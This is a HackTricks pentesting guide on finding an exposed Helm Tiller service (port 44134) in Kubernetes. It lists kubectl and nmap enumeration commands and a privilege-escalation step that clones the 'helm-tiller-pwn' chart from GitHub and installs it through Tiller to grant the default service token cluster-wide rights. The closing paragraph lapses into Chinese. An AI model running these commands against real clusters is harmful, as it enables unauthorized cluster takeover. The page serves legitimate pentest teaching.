hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md
2023-08-03 19:12:22 +00:00


☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Basic Information

Helm is the package manager for Kubernetes. It allows packaging YAML files and distributing them in public and private repositories. These packages are called Helm Charts. Tiller is the service that runs by default on port 44134.

Default port: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

Enumeration

If you can enumerate pods and/or services of different namespaces, enumerate them and search for the ones with **"tiller"** in their name:

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Examples:

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

You can also try to find out whether this service is running by checking port 44134:

sudo nmap -sS -p 44134 <IP>

Once you have discovered it, you can communicate with it by downloading the client helm application. You can use a tool like homebrew, or check the official releases page. For more details or other options, see the installation guide.

Then you can enumerate the service:

helm --host tiller-deploy.kube-system:44134 version

Privilege Escalation

By default, Helm2 was installed in the kube-system namespace with high privileges, so if you find the service and can access it, this may allow you to escalate privileges.

You just need to install a package like this one: https://github.com/Ruil1n/helm-tiller-pwn, which will give the default service token access to everything in the whole cluster.

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn/pwnchart

http://rui0.cn/archives/1573中,你可以找到攻击的解释但基本上如果你阅读_helm-tiller-pwn/pwnchart/templates/_目录下的clusterrole.yamlclusterrolebinding.yaml文件,你会看到所有权限都被授予了默认令牌
